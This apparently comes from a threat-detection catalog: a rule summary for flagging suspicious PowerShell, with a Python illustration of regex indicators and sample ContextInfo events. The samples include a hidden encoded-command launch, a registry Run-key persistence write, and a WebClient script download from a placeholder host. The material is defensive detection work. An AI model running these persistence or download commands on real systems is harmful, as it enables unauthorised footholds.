
Summary
This threat detection rule identifies suspicious PowerShell command invocations that may indicate malicious activity. It looks for patterns in the PowerShell ContextInfo field, specifically parameters and invocation techniques commonly associated with exploitation and evasion, across several contexts: base64-encoded commands, calls to particular object-creation methods, additions to the Windows registry for persistence, and the use of web clients to download scripts. A filter excludes known benign operations of Chocolatey, a popular package manager for Windows, to reduce false positives. By flagging these indicators in ContextInfo while exempting approved activity, the rule helps mitigate the risk of malicious PowerShell use in a Windows environment.
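The following is an added illustration of the matching logic the summary describes, written for this page rather than taken from the rule itself: the indicator regexes, the Chocolatey exclusion marker, and the ContextInfo samples are all assumptions constructed here, and the real rule's selectors may differ.

```python
import re
from typing import Dict, List

# One regex per context named in the summary. These are assumed patterns
# written for this example, not the detection rule's own selectors.
INDICATORS: Dict[str, "re.Pattern[str]"] = {
    # -enc / -EncodedCommand followed by a base64-looking argument
    "encoded_command": re.compile(
        r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{16,}", re.I),
    # object-creation cmdlet
    "object_creation": re.compile(r"\bNew-Object\b", re.I),
    # registry write into a CurrentVersion\Run autostart key
    "registry_persistence": re.compile(
        r"\b(?:New|Set)-ItemProperty\b.*\\CurrentVersion\\Run\b", re.I | re.S),
    # web client used to fetch script content
    "web_download": re.compile(
        r"\b(?:Net\.)?WebClient\b.*\bDownload(?:String|File)\b", re.I | re.S),
}

# Benign-exclusion filter (assumed marker): Chocolatey helper scripts and paths.
CHOCOLATEY_FILTER = re.compile(r"chocolatey", re.I)


def classify(context_info: str) -> List[str]:
    """Return the indicator names that fire on one ContextInfo value.
    The Chocolatey filter is applied first, so exempted events return []."""
    if CHOCOLATEY_FILTER.search(context_info):
        return []
    return [name for name, pat in INDICATORS.items() if pat.search(context_info)]


def triage(events: List[str]) -> Dict[int, List[str]]:
    """Map event index -> fired indicators, keeping only events that alert."""
    return {i: fired for i, ctx in enumerate(events) if (fired := classify(ctx))}


# Constructed ContextInfo samples (not real telemetry); the base64 blob is
# just the uppercase alphabet encoded, chosen as an obviously harmless filler.
SAMPLE_EVENTS = [
    "Host Application = powershell.exe -nop -w hidden -enc QUJDREVGR0hJSktMTU5PUFFSU1RVVldYWVo=",
    "Command Name = New-ItemProperty -Path HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -Name Updater -Value C:\\Users\\Public\\u.ps1",
    "Command Name = (New-Object Net.WebClient).DownloadString('http://example.invalid/s.ps1')",
    "Host Application = powershell.exe -NoProfile C:\\ProgramData\\chocolatey\\helpers\\chocolateyInstall.ps1 (New-Object Net.WebClient).DownloadFile(...)",
    "Command Name = Get-ChildItem -Path C:\\Users\\alice\\Documents",
]

if __name__ == "__main__":
    for idx, fired in triage(SAMPLE_EVENTS).items():
        print(f"event {idx}: {', '.join(fired)}")
```

Event 3 matches two indicators but is suppressed by the Chocolatey filter, which is the false-positive trade-off the summary mentions: any attacker-controlled path containing that string would be exempted too, so the exclusion should be as narrow as the real deployment allows.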
Categories
- Endpoint
- Windows
Data Sources
- Process
- Command
Created: 2017-03-05